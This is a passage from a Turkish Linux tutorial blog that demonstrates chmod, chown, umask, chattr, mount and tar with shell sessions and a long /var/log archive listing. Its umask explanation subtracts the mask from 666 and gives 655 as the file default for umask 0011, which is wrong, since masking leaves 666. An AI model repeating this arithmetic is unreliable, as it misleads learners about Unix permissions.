drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x  2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr--  1 root root    0 May 19 00:59 dosya1*


chmod -R 755 dizin1/ ile -R parametresi ile kullandığımızda dizin1 ve dizin1 in altındaki dosyaların izinlerini recursive olarak 755 izin bilgisi ile değiştiririz.

chown : Dosya ve dizinlerin sahibini ve grubunu belirleriz.

hakan eren # ll 
total 40
drwxr-xr-x  5 root root 4096 May 19 00:59 ./
drwx------ 26 root root 4096 May 18 04:42 ../
drwxr-xr-x  2 root root 4096 May 19 00:59 dizin1/
-rwxr-xr--  1 root root    0 May 19 00:59 dosya1*

chown hakan dosya1

Dosya1 in sahibini hakan olarak değiştireceğiz.

hakan eren # chown hakan dosya1
hakan eren # ll
total 40
drwxr-xr-x  2 root  root 4096 May 19 00:59 dizin1/
-rwxr-xr--  1 hakan root    0 May 19 00:59 dosya1*


chown hakan:hakan dosya1 şeklinde kullandığımızda dosya1 in hem sahibini hem grubunu değiştirmiş oluruz.

hakan eren # chown hakan:hakan dosya1
hakan eren # ll
total 40
drwxr-xr-x  2 root  root 4096 May 19 00:59 dizin1/
-rwxr-xr--  1 hakan hakan    0 May 19 00:59 dosya1*

sadece grubunu değiştirmek için

chown :root dosya1 şeklinde de yapabiliriz.

hakan eren # chown :root dosya1
hakan eren # ll
total 40
drwxr-xr-x  2 root  root 4096 May 19 00:59 dizin1/
-rwxr-xr--  1 hakan root    0 May 19 00:59 dosya1*

chown -R hakan:hakan dizin1/ şeklinde -R parametresi ile kullanıldığında dizini ve dizinin altındakilerin recursive olarak sahibini ve grubunu değiştiririz.

dizin1 in sahibini ve grubunu kendisi ve altındaki tüm dizinler dahil hakan olarak değiştiririz.

Aşağıda chmod ile ilgili dosyaların rakamsal olarak değerlerine daha detaylı bakabilirsiniz. Kaynak : http://linuxcommand.org/lts0070.php

777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
666 (rw-rw-rw-) All users may read and write the file.
644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.

20 Mayıs 2016 Cuma

Linux umask, chattr, mount, tar komutları


umask : Dosya ve dizinlerin varsayılan izinlerini görmeye ve değiştirmeye yarar.

hakan eren # umask
0022


Ekran çıkan bu değer verilmeyen izinleri temsil eder.

777-022 = 755 varsayılan dizin iznimizdir.
666-022 = 644 varsayılandaki dosya iznimizdir

usmask ile bu değerleri değiştirebiliriz

hakan eren # umask 0011
hakan eren # umask
0011


777-011 = 766 varsayılan dizin izni
666-011 = 655 varsayılan dosya izni

Dosya sistemlerinde  izinlerin yanı sıra veri günlükleme, sıkıştırma ve değişmezlik gibi ek özniteliklerde bulunmaktadır. Bu gibi öz nitelikleri chattr komutu ile değiştirebiliriz.

chattr +i ornekdosya

hakan eren # touch ornekdosya
hakan eren # chattr +i ornekdosya 
hakan eren # rm -rf ornekdosya 
rm: cannot remove ‘ornekdosya’: Operation not permitted


+i parametresi ile kullandığımızda dosyayı root kullanıcısı olmamıza rağmen silemiyoruz. not permitted diye izinli olmadığımızı söyleyen bir uyarı verir. Dosyayı kimsenin silmesini istemezsek chattr komutunu +i parametresi ile kullanırız.

Bu işlemi geri almak istediğimizde chattr komutunu -i parametresini kullanarak yazarız. ve silebiliriz.

hakan eren # chattr -i ornekdosya
hakan eren # rm -rf ornekdosya

chattr -i dosya
chattr -a dosya
chattr -A dosya

a : Tanımlandığında,dosya üzerine sadece yeni veri eklenebilir fakat varolan veriler değiştirilemez.
veyasilinemez
i : Tanımlandığında,dosya içeriğiherhangi bir şekildedeğiştirilemez(silinemez, isimdeğişikliğiyapılamaz)
A: Tanımlandığında dosyaya yapılanerişimlere ait zamanbilgisi (atime)güncellenmez.

mount : Sistemdeki aygıtların bağlanma yerlerini bu komutu ile görebiliriz.


hakan@hakan ~ $ mount
/dev/sda2 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
none on /sys/firmware/efi/efivars type efivarfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda1 on /boot/efi type vfat (rw)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,user=hakan)


/dev/sda2 kök dizinine bağlıdır.

mount komutuyla sistem aygıtlarını istediğimiz dizinede bağlayabiliriz.

mount -o loop,rw centos.iso /mnt herhangi bir iso dosyasını istediğimiz dizine bu komut ile bağlayabiliriz

mount -t ext4 /dev/sda3 /mnt/ İstediğimiz bir disk bölümünü istediğimiz dizine bağlarız. -t parametresi ile ext4 formatı ile dizine bağlayacağımızı belirtmiş oluruz.

tar : Dosya ve dizinleri arşivlemek için kullanılır.

tar -cvzf log.tar.gz /var/log/

hakan paste # tar -cvzf log.tar.gz /var/log/
tar: Removing leading `/' from member names
/var/log/
/var/log/Xorg.20.log
/var/log/syslog.4.gz
/var/log/pm-powersave.log
/var/log/dpkg.log
/var/log/syslog.2.gz
/var/log/dmesg.1.gz
/var/log/ConsoleKit/
/var/log/ConsoleKit/history.2.gz
/var/log/ConsoleKit/history.1
/var/log/ConsoleKit/history
/var/log/dmesg.4.gz
/var/log/udev
/var/log/pm-powersave.log.2.gz
/var/log/syslog.5.gz
/var/log/hp/
/var/log/hp/tmp/
/var/log/fontconfig.log
/var/log/boot.log
/var/log/syslog.3.gz
/var/log/btmp.1
/var/log/cups/
/var/log/cups/access_log.6.gz
/var/log/cups/access_log.5.gz
/var/log/cups/error_log
/var/log/cups/access_log.3.gz
/var/log/cups/page_log
/var/log/cups/access_log
/var/log/cups/access_log.2.gz
/var/log/cups/access_log.7.gz
/var/log/cups/access_log.4.gz
/var/log/cups/access_log.1.gz
/var/log/auth.log.4.gz
/var/log/mysql/
/var/log/mysql/error.log
/var/log/mysql/error.log.4.gz
/var/log/mysql/error.log.6.gz
/var/log/mysql/error.log.3.gz
/var/log/mysql/error.log.7.gz
/var/log/mysql/error.log.5.gz
/var/log/mysql/error.log.1.gz
/var/log/mysql/error.log.2.gz
/var/log/mysql.log.3.gz
/var/log/fsck/
/var/log/fsck/checkroot
/var/log/fsck/checkfs
/var/log/mysql.log.6.gz
/var/log/btmp
/var/log/aptitude
/var/log/dmesg.2.gz
/var/log/mysql.log.5.gz
/var/log/upstart/
/var/log/upstart/cups.log.6.gz
/var/log/upstart/dbus.log.4.gz
/var/log/upstart/alsa-restore.log.6.gz
/var/log/upstart/plymouth-shutdown.log.3.gz
/var/log/upstart/procps-static-network-up.log.2.gz
/var/log/upstart/plymouth-shutdown.log.7.gz
/var/log/upstart/console-setup.log.5.gz
/var/log/upstart/gpu-manager.log.6.gz
/var/log/upstart/gpu-manager.log.4.gz
/var/log/upstart/mountall.log.1.gz
/var/log/upstart/network-manager.log.3.gz
/var/log/upstart/cups.log.7.gz
/var/log/upstart/cups.log.3.gz
/var/log/upstart/alsa-state.log.1.gz
/var/log/upstart/network-manager.log.5.gz
/var/log/upstart/modemmanager.log.5.gz
/var/log/upstart/dbus.log.6.gz
/var/log/upstart/mysql.log.3.gz
/var/log/upstart/mysql.log.6.gz
/var/log/upstart/network-manager.log.2.gz
/var/log/upstart/alsa-state.log.7.gz
/var/log/upstart/container-detect.log.2.gz
/var/log/upstart/kmod.log.4.gz
/var/log/upstart/alsa-state.log.5.gz
/var/log/upstart/ureadahead-other.log.7.gz
/var/log/upstart/mysql.log.5.gz
/var/log/upstart/dbus.log.1.gz
/var/log/upstart/kmod.log.1.gz
/var/log/upstart/console-setup.log.1.gz
/var/log/upstart/procps-virtual-filesystems.log.2.gz
/var/log/upstart/procps-static-network-up.log.6.gz
/var/log/upstart/gpu-manager.log.5.gz
/var/log/upstart/plymouth-shutdown.log.4.gz
/var/log/upstart/modemmanager.log.3.gz
/var/log/upstart/mountall.log.6.gz
/var/log/upstart/procps-virtual-filesystems.log.3.gz
/var/log/upstart/cups.log.5.gz
/var/log/upstart/network-manager.log.7.gz
/var/log/upstart/systemd-logind.log.2.gz
/var/log/upstart/kmod.log.2.gz
/var/log/upstart/kmod.log.3.gz
/var/log/upstart/alsa-state.log.6.gz
/var/log/upstart/alsa-restore.log.4.gz
/var/log/upstart/procps-virtual-filesystems.log.4.gz
/var/log/upstart/ureadahead-other.log.5.gz
/var/log/upstart/systemd-logind.log.7.gz
/var/log/upstart/procps-static-network-up.log.7.gz
/var/log/upstart/kmod.log.5.gz
/var/log/upstart/plymouth-shutdown.log.2.gz
/var/log/upstart/alsa-restore.log.1.gz
/var/log/upstart/alsa-state.log.4.gz
/var/log/upstart/plymouth-shutdown.log.5.gz
/var/log/upstart/console-setup.log.3.gz
/var/log/upstart/plymouth-shutdown.log.1.gz
/var/log/upstart/container-detect.log.1.gz
/var/log/upstart/procps-virtual-filesystems.log.7.gz
/var/log/upstart/dbus.log.3.gz
/var/log/upstart/kmod.log.6.gz
/var/log/upstart/ureadahead.log.2.gz
/var/log/upstart/container-detect.log.7.gz
/var/log/upstart/alsa-restore.log.3.gz
/var/log/upstart/mysql.log.7.gz
/var/log/upstart/wait-for-state-plymouth-shutdownmdm.log.1.gz
/var/log/upstart/alsa-state.log.2.gz
/var/log/upstart/modemmanager.log.7.gz
/var/log/upstart/container-detect.log.5.gz
/var/log/upstart/procps-static-network-up.log.4.gz
/var/log/upstart/ureadahead.log.5.gz
/var/log/upstart/procps-static-network-up.log.3.gz
/var/log/upstart/gpu-manager.log.2.gz
/var/log/upstart/mysql.log.1.gz
/var/log/upstart/console-setup.log.4.gz
/var/log/upstart/gpu-manager.log.1.gz
/var/log/upstart/console-setup.log.6.gz
/var/log/upstart/ureadahead.log.1.gz
/var/log/upstart/kmod.log.7.gz
/var/log/upstart/container-detect.log.6.gz
/var/log/upstart/mountall.log.7.gz
/var/log/upstart/dbus.log.7.gz
/var/log/upstart/ureadahead-other.log.3.gz
/var/log/upstart/mysql.log.2.gz
/var/log/upstart/modemmanager.log.6.gz
/var/log/upstart/procps-virtual-filesystems.log.5.gz
/var/log/upstart/mountall.log.3.gz
/var/log/upstart/mountall.log.2.gz
/var/log/upstart/ureadahead-other.log.4.gz
/var/log/upstart/systemd-logind.log.6.gz
/var/log/upstart/mountall.log.4.gz
/var/log/upstart/systemd-logind.log.5.gz
/var/log/upstart/mountall.log.5.gz
/var/log/upstart/console-setup.log.2.gz
/var/log/upstart/ureadahead-other.log.1.gz
/var/log/upstart/systemd-logind.log.1.gz
/var/log/upstart/procps-static-network-up.log.1.gz
/var/log/upstart/ureadahead.log.6.gz
/var/log/upstart/dbus.log.2.gz
/var/log/upstart/network-manager.log.4.gz
/var/log/upstart/ureadahead-other.log.6.gz
/var/log/upstart/ureadahead.log.3.gz
/var/log/upstart/modemmanager.log.4.gz
/var/log/upstart/alsa-state.log.3.gz
/var/log/upstart/systemd-logind.log.4.gz
/var/log/upstart/network-manager.log.1.gz
/var/log/upstart/mysql.log.4.gz
/var/log/upstart/container-detect.log.4.gz
/var/log/upstart/ureadahead.log.4.gz
/var/log/upstart/gpu-manager.log.7.gz
/var/log/upstart/ureadahead-other.log.2.gz
/var/log/upstart/ureadahead.log.7.gz
/var/log/upstart/gpu-manager.log.3.gz
/var/log/upstart/network-manager.log.6.gz
/var/log/upstart/procps-static-network-up.log.5.gz
/var/log/upstart/alsa-restore.log.5.gz
/var/log/upstart/plymouth-shutdown.log.6.gz
/var/log/upstart/cups.log.4.gz
/var/log/upstart/cups.log.1.gz
/var/log/upstart/alsa-restore.log.2.gz
/var/log/upstart/modemmanager.log.2.gz
/var/log/upstart/systemd-logind.log.3.gz
/var/log/upstart/procps-virtual-filesystems.log.6.gz
/var/log/upstart/cups.log.2.gz
/var/log/upstart/container-detect.log.3.gz
/var/log/upstart/dbus.log.5.gz
/var/log/upstart/modemmanager.log.1.gz
/var/log/upstart/procps-virtual-filesystems.log.1.gz
/var/log/upstart/console-setup.log.7.gz
/var/log/kern.log.3.gz
/var/log/lastlog
/var/log/dpkg.log.1
/var/log/faillog
/var/log/dmesg.0
/var/log/samba/
/var/log/samba/log.172.20.10.3
/var/log/samba/log.tamay-pc
/var/log/samba/log.10.99.10.216
/var/log/samba/log.10.99.13.165
/var/log/samba/log.10.99.12.45
/var/log/samba/log.10.99.8.248
/var/log/samba/log.10.99.1.32
/var/log/samba/log.10.99.9.127
/var/log/samba/log.kocatepekahve
/var/log/samba/log.user-bilgisayar
/var/log/samba/log.10.99.1.248
/var/log/samba/log.smbd
/var/log/samba/log.smbd.7.gz
/var/log/samba/log.nmbd.4.gz
/var/log/samba/log.10.99.4.165
/var/log/samba/log.nmbd.7.gz
/var/log/samba/log.192.168.1.37
/var/log/samba/log.user34
/var/log/samba/log.sengul
/var/log/samba/log.ert-bilgisayar
/var/log/samba/log.192.168.1.50
/var/log/samba/log.ahmety__cesan
/var/log/samba/log.lenovo-pc
/var/log/samba/log.smbd.1.gz
/var/log/samba/log.%m
/var/log/samba/log.nmbd.2.gz
/var/log/samba/log.192.168.43.101
/var/log/samba/log.nmbd
/var/log/samba/log.x
/var/log/samba/log.smbd.3.gz
/var/log/samba/log.smbd.2.gz
/var/log/samba/log.192.168.0.100
/var/log/samba/log.ender-pc
/var/log/samba/log.smbd.4.gz
/var/log/samba/log.desktop-5n291m6
/var/log/samba/log.smbd.5.gz
/var/log/samba/log.10.99.11.73
/var/log/samba/log.ert
/var/log/samba/log.10.99.9.249
/var/log/samba/log.metehn
/var/log/samba/log.smbd.6.gz
/var/log/samba/log.clientxp
/var/log/samba/cores/
/var/log/samba/cores/nmbd/
/var/log/samba/cores/smbd/
/var/log/samba/log.sahiner-vaio
/var/log/samba/log.192.168.1.64
/var/log/samba/log.10.99.0.150
/var/log/samba/log.10.99.9.77
/var/log/samba/log.192.168.1.48
/var/log/samba/log.192.168.1.35
/var/log/samba/log.nmbd.6.gz
/var/log/samba/log.10.99.7.218
/var/log/samba/log.192.168.1.33
/var/log/samba/log.user32
/var/log/samba/log.nmbd.5.gz
/var/log/samba/log.192.168.1.51
/var/log/samba/log.nmbd.1.gz
/var/log/samba/log.pc121
/var/log/samba/log.192.168.1.34
/var/log/samba/log.192.168.2.6
/var/log/samba/log.unipc
/var/log/samba/log.samsung
/var/log/samba/log.kali
/var/log/samba/log.nmbd.3.gz
/var/log/samba/log.192.168.1.59
/var/log/samba/log.ruya
/var/log/samba/log.mustafa
/var/log/samba/log.user5
/var/log/samba/log.10.99.6.30
/var/log/mintsystem.log
/var/log/kern.log.2.gz
/var/log/Xorg.0.log.old
/var/log/apache2/
/var/log/apache2/error.log.10.gz
/var/log/apache2/access.log.9.gz
/var/log/apache2/access.log.3.gz
/var/log/apache2/error.log
/var/log/apache2/access.log.8.gz
/var/log/apache2/error.log.4.gz
/var/log/apache2/access.log.2.gz
/var/log/apache2/error.log.9.gz
/var/log/apache2/access.log.7.gz
/var/log/apache2/access.log.6.gz
/var/log/apache2/error.log.6.gz
/var/log/apache2/other_vhosts_access.log
/var/log/apache2/access.log.5.gz
/var/log/apache2/error.log.11.gz
/var/log/apache2/access.log.10.gz
/var/log/apache2/error.log.8.gz
/var/log/apache2/error.log.3.gz
/var/log/apache2/error.log.7.gz
/var/log/apache2/access.log
/var/log/apache2/access.log.4.gz
/var/log/apache2/access.log.1
/var/log/apache2/error.log.5.gz
/var/log/apache2/error.log.1
/var/log/apache2/error.log.2.gz
/var/log/apache2/access.log.11.gz
/var/log/auth.log
/var/log/kern.log.4.gz
/var/log/pm-powersave.log.1
/var/log/alternatives.log.2.gz
/var/log/pm-suspend.log.2.gz
/var/log/syslog.1
/var/log/mysql.log
/var/log/mysql.log.7.gz
/var/log/mdm/
/var/log/mdm/:0.log
/var/log/mdm/:0.log.1
/var/log/mdm/:0.log.3
/var/log/mdm/:0.log.2
/var/log/mdm/:0.log.4
/var/log/mdm/:20.log
/var/log/syslog.7.gz
/var/log/pycentral.log
/var/log/apt/
/var/log/apt/history.log.1.gz
/var/log/apt/history.log
/var/log/apt/term.log.2.gz
/var/log/apt/term.log
/var/log/apt/term.log.1.gz
/var/log/apt/history.log.2.gz
/var/log/auth.log.3.gz
/var/log/kern.log.1
/var/log/wtmp
/var/log/dpkg.log.2.gz
/var/log/mysql.log.1.gz
/var/log/unattended-upgrades/
/var/log/unattended-upgrades/unattended-upgrades-shutdown.log
/var/log/mysql.log.2.gz
/var/log/alternatives.log
/var/log/syslog.6.gz
/var/log/kern.log
/var/log/Xorg.0.log
/var/log/pm-suspend.log.1
/var/log/alternatives.log.1
/var/log/syslog
/var/log/aptitude.1.gz
/var/log/speech-dispatcher/
/var/log/gpu-manager.log
/var/log/installer/
/var/log/installer/initial-status.gz
/var/log/installer/version
/var/log/installer/debug
/var/log/installer/partman
/var/log/installer/casper.log
/var/log/installer/syslog
/var/log/installer/media-info
/var/log/mysql.log.4.gz
/var/log/pm-suspend.log
/var/log/mysql.err
/var/log/auth.log.2.gz
/var/log/dbconfig-common/
/var/log/dbconfig-common/dbc.log
/var/log/auth.log.1
/var/log/dmesg
/var/log/vbox-install.log
/var/log/wtmp.1
/var/log/bootstrap.log
/var/log/dmesg.3.gz
hakan paste # ll
-rw-rw-rw-  1 root root 2478668 May 19 21:04 log.tar.gz


log dosyalarını tar ile tek bir dosya olacak şekilde sıkıştırarak arşivleriz /var/log dizini altındaki tüm dosyaları log.tar.gz şeklinde tek bir dosyada sıkıştırdı.

Sıkıştırılmış dosyayıda açmak için tar -xvzf log.tar.gz şeklinde yazarak çıkarabiliriz. /var ı çıkardı ve altındaki tüm dizinleri bunlarıda ls ile gördük

hakan paste # tar -xvzf log.tar.gz 
var/log/
var/log/Xorg.20.log
var/log/syslog.4.gz
var/log/pm-powersave.log
var/log/dpkg.log
var/log/syslog.2.gz
var/log/dmesg.1.gz
var/log/ConsoleKit/
var/log/ConsoleKit/history.2.gz
var/log/ConsoleKit/history.1
var/log/ConsoleKit/history
var/log/dmesg.4.gz
var/log/udev
var/log/pm-powersave.log.2.gz
var/log/syslog.5.gz
var/log/hp/
var/log/hp/tmp/
var/log/fontconfig.log
var/log/boot.log
var/log/syslog.3.gz
var/log/btmp.1
var/log/cups/
var/log/cups/access_log.6.gz
var/log/cups/access_log.5.gz
var/log/cups/error_log
var/log/cups/access_log.3.gz
var/log/cups/page_log
var/log/cups/access_log
var/log/cups/access_log.2.gz
var/log/cups/access_log.7.gz
var/log/cups/access_log.4.gz
var/log/cups/access_log.1.gz
var/log/auth.log.4.gz
var/log/mysql/
var/log/mysql/error.log
var/log/mysql/error.log.4.gz
var/log/mysql/error.log.6.gz
var/log/mysql/error.log.3.gz
var/log/mysql/error.log.7.gz
var/log/mysql/error.log.5.gz
var/log/mysql/error.log.1.gz
var/log/mysql/error.log.2.gz
var/log/mysql.log.3.gz
var/log/fsck/
var/log/fsck/checkroot
var/log/fsck/checkfs
var/log/mysql.log.6.gz
var/log/btmp
var/log/aptitude
var/log/dmesg.2.gz
var/log/mysql.log.5.gz
var/log/upstart/
var/log/upstart/cups.log.6.gz
var/log/upstart/dbus.log.4.gz
var/log/upstart/alsa-restore.log.6.gz
var/log/upstart/plymouth-shutdown.log.3.gz
var/log/upstart/procps-static-network-up.log.2.gz
var/log/upstart/plymouth-shutdown.log.7.gz
var/log/upstart/console-setup.log.5.gz
var/log/upstart/gpu-manager.log.6.gz
var/log/upstart/gpu-manager.log.4.gz
var/log/upstart/mountall.log.1.gz
var/log/upstart/network-manager.log.3.gz
var/log/upstart/cups.log.7.gz
var/log/upstart/cups.log.3.gz
var/log/upstart/alsa-state.log.1.gz
var/log/upstart/network-manager.log.5.gz
var/log/upstart/modemmanager.log.5.gz
var/log/upstart/dbus.log.6.gz
var/log/upstart/mysql.log.3.gz
var/log/upstart/mysql.log.6.gz
var/log/upstart/network-manager.log.2.gz
var/log/upstart/alsa-state.log.7.gz
var/log/upstart/container-detect.log.2.gz
var/log/upstart/kmod.log.4.gz
var/log/upstart/alsa-state.log.5.gz
var/log/upstart/ureadahead-other.log.7.gz
var/log/upstart/mysql.log.5.gz
var/log/upstart/dbus.log.1.gz
var/log/upstart/kmod.log.1.gz
var/log/upstart/console-setup.log.1.gz
var/log/upstart/procps-virtual-filesystems.log.2.gz
var/log/upstart/procps-static-network-up.log.6.gz
var/log/upstart/gpu-manager.log.5.gz
var/log/upstart/plymouth-shutdown.log.4.gz
var/log/upstart/modemmanager.log.3.gz
var/log/upstart/mountall.log.6.gz
var/log/upstart/procps-virtual-filesystems.log.3.gz
var/log/upstart/cups.log.5.gz
var/log/upstart/network-manager.log.7.gz
var/log/upstart/systemd-logind.log.2.gz
var/log/upstart/kmod.log.2.gz
var/log/upstart/kmod.log.3.gz
var/log/upstart/alsa-state.log.6.gz
var/log/upstart/alsa-restore.log.4.gz
var/log/upstart/procps-virtual-filesystems.log.4.gz
var/log/upstart/ureadahead-other.log.5.gz
var/log/upstart/systemd-logind.log.7.gz
var/log/upstart/procps-static-network-up.log.7.gz
var/log/upstart/kmod.log.5.gz
var/log/upstart/plymouth-shutdown.log.2.gz
var/log/upstart/alsa-restore.log.1.gz
var/log/upstart/alsa-state.log.4.gz
var/log/upstart/plymouth-shutdown.log.5.gz
var/log/upstart/console-setup.log.3.gz
var/log/upstart/plymouth-shutdown.log.1.gz
var/log/upstart/container-detect.log.1.gz
var/log/upstart/procps-virtual-filesystems.log.7.gz
var/log/upstart/dbus.log.3.gz
var/log/upstart/kmod.log.6.gz
var/log/upstart/ureadahead.log.2.gz
var/log/upstart/container-detect.log.7.gz
var/log/upstart/alsa-restore.log.3.gz
var/log/upstart/mysql.log.7.gz
var/log/upstart/wait-for-state-plymouth-shutdownmdm.log.1.gz
var/log/upstart/alsa-state.log.2.gz
var/log/upstart/modemmanager.log.7.gz
var/log/upstart/container-detect.log.5.gz
var/log/upstart/procps-static-network-up.log.4.gz
var/log/upstart/ureadahead.log.5.gz
var/log/upstart/procps-static-network-up.log.3.gz
var/log/upstart/gpu-manager.log.2.gz
var/log/upstart/mysql.log.1.gz
var/log/upstart/console-setup.log.4.gz
var/log/upstart/gpu-manager.log.1.gz
var/log/upstart/console-setup.log.6.gz
var/log/upstart/ureadahead.log.1.gz
var/log/upstart/kmod.log.7.gz
var/log/upstart/container-detect.log.6.gz
var/log/upstart/mountall.log.7.gz
var/log/upstart/dbus.log.7.gz
var/log/upstart/ureadahead-other.log.3.gz
var/log/upstart/mysql.log.2.gz
var/log/upstart/modemmanager.log.6.gz
var/log/upstart/procps-virtual-filesystems.log.5.gz
var/log/upstart/mountall.log.3.gz
var/log/upstart/mountall.log.2.gz
var/log/upstart/ureadahead-other.log.4.gz
var/log/upstart/systemd-logind.log.6.gz
var/log/upstart/mountall.log.4.gz
var/log/upstart/systemd-logind.log.5.gz
var/log/upstart/mountall.log.5.gz
var/log/upstart/console-setup.log.2.gz
var/log/upstart/ureadahead-other.log.1.gz
var/log/upstart/systemd-logind.log.1.gz
var/log/upstart/procps-static-network-up.log.1.gz
var/log/upstart/ureadahead.log.6.gz
var/log/upstart/dbus.log.2.gz
var/log/upstart/network-manager.log.4.gz
var/log/upstart/ureadahead-other.log.6.gz
var/log/upstart/ureadahead.log.3.gz
var/log/upstart/modemmanager.log.4.gz
var/log/upstart/alsa-state.log.3.gz
var/log/upstart/systemd-logind.log.4.gz
var/log/upstart/network-manager.log.1.gz
var/log/upstart/mysql.log.4.gz
var/log/upstart/container-detect.log.4.gz
var/log/upstart/ureadahead.log.4.gz
var/log/upstart/gpu-manager.log.7.gz
var/log/upstart/ureadahead-other.log.2.gz
var/log/upstart/ureadahead.log.7.gz
var/log/upstart/gpu-manager.log.3.gz
var/log/upstart/network-manager.log.6.gz
var/log/upstart/procps-static-network-up.log.5.gz
var/log/upstart/alsa-restore.log.5.gz
var/log/upstart/plymouth-shutdown.log.6.gz
var/log/upstart/cups.log.4.gz
var/log/upstart/cups.log.1.gz
var/log/upstart/alsa-restore.log.2.gz
var/log/upstart/modemmanager.log.2.gz
var/log/upstart/systemd-logind.log.3.gz
var/log/upstart/procps-virtual-filesystems.log.6.gz
var/log/upstart/cups.log.2.gz
var/log/upstart/container-detect.log.3.gz
var/log/upstart/dbus.log.5.gz
var/log/upstart/modemmanager.log.1.gz
var/log/upstart/procps-virtual-filesystems.log.1.gz
var/log/upstart/console-setup.log.7.gz
var/log/kern.log.3.gz
var/log/lastlog
var/log/dpkg.log.1
var/log/faillog
var/log/dmesg.0
var/log/samba/
var/log/samba/log.172.20.10.3
var/log/samba/log.tamay-pc
var/log/samba/log.10.99.10.216
var/log/samba/log.10.99.13.165
var/log/samba/log.10.99.12.45
var/log/samba/log.10.99.8.248
var/log/samba/log.10.99.1.32
var/log/samba/log.10.99.9.127
var/log/samba/log.kocatepekahve
var/log/samba/log.user-bilgisayar
var/log/samba/log.10.99.1.248
var/log/samba/log.smbd
var/log/samba/log.smbd.7.gz
var/log/samba/log.nmbd.4.gz
var/log/samba/log.10.99.4.165
var/log/samba/log.nmbd.7.gz
var/log/samba/log.192.168.1.37
var/log/samba/log.user34
var/log/samba/log.sengul
var/log/samba/log.ert-bilgisayar
var/log/samba/log.192.168.1.50
var/log/samba/log.ahmety__cesan
var/log/samba/log.lenovo-pc
var/log/samba/log.smbd.1.gz
var/log/samba/log.%m
var/log/samba/log.nmbd.2.gz
var/log/samba/log.192.168.43.101
var/log/samba/log.nmbd
var/log/samba/log.x
var/log/samba/log.smbd.3.gz
var/log/samba/log.smbd.2.gz
var/log/samba/log.192.168.0.100
var/log/samba/log.ender-pc
var/log/samba/log.smbd.4.gz
var/log/samba/log.desktop-5n291m6
var/log/samba/log.smbd.5.gz
var/log/samba/log.10.99.11.73
var/log/samba/log.ert
var/log/samba/log.10.99.9.249
var/log/samba/log.metehn
var/log/samba/log.smbd.6.gz
var/log/samba/log.clientxp
var/log/samba/cores/
var/log/samba/cores/nmbd/
var/log/samba/cores/smbd/
var/log/samba/log.sahiner-vaio
var/log/samba/log.192.168.1.64
var/log/samba/log.10.99.0.150
var/log/samba/log.10.99.9.77
var/log/samba/log.192.168.1.48
var/log/samba/log.192.168.1.35
var/log/samba/log.nmbd.6.gz
var/log/samba/log.10.99.7.218
var/log/samba/log.192.168.1.33
var/log/samba/log.user32
var/log/samba/log.nmbd.5.gz
var/log/samba/log.192.168.1.51
var/log/samba/log.nmbd.1.gz
var/log/samba/log.pc121
var/log/samba/log.192.168.1.34
var/log/samba/log.192.168.2.6
var/log/samba/log.unipc
var/log/samba/log.samsung
var/log/samba/log.kali
var/log/samba/log.nmbd.3.gz
var/log/samba/log.192.168.1.59
var/log/samba/log.ruya
var/log/samba/log.mustafa
var/log/samba/log.user5
var/log/samba/log.10.99.6.30
var/log/mintsystem.log
var/log/kern.log.2.gz
var/log/Xorg.0.log.old
var/log/apache2/
var/log/apache2/error.log.10.gz
var/log/apache2/access.log.9.gz
var/log/apache2/access.log.3.gz
var/log/apache2/error.log
var/log/apache2/access.log.8.gz
var/log/apache2/error.log.4.gz
var/log/apache2/access.log.2.gz
var/log/apache2/error.log.9.gz
var/log/apache2/access.log.7.gz
var/log/apache2/access.log.6.gz
var/log/apache2/error.log.6.gz
var/log/apache2/other_vhosts_access.log
var/log/apache2/access.log.5.gz
var/log/apache2/error.log.11.gz
var/log/apache2/access.log.10.gz
var/log/apache2/error.log.8.gz
var/log/apache2/error.log.3.gz
var/log/apache2/error.log.7.gz
var/log/apache2/access.log
var/log/apache2/access.log.4.gz
var/log/apache2/access.log.1
var/log/apache2/error.log.5.gz
var/log/apache2/error.log.1
var/log/apache2/error.log.2.gz
var/log/apache2/access.log.11.gz
var/log/auth.log
var/log/kern.log.4.gz
var/log/pm-powersave.log.1
var/log/alternatives.log.2.gz
var/log/pm-suspend.log.2.gz
var/log/syslog.1
var/log/mysql.log
var/log/mysql.log.7.gz
var/log/mdm/
var/log/mdm/:0.log
var/log/mdm/:0.log.1
var/log/mdm/:0.log.3
var/log/mdm/:0.log.2
var/log/mdm/:0.log.4
var/log/mdm/:20.log
var/log/syslog.7.gz
var/log/pycentral.log
var/log/apt/
var/log/apt/history.log.1.gz
var/log/apt/history.log
var/log/apt/term.log.2.gz
var/log/apt/term.log
var/log/apt/term.log.1.gz
var/log/apt/history.log.2.gz
var/log/auth.log.3.gz
var/log/kern.log.1
var/log/wtmp
var/log/dpkg.log.2.gz
var/log/mysql.log.1.gz
var/log/unattended-upgrades/
var/log/unattended-upgrades/unattended-upgrades-shutdown.log
var/log/mysql.log.2.gz
var/log/alternatives.log
var/log/syslog.6.gz
var/log/kern.log
var/log/Xorg.0.log
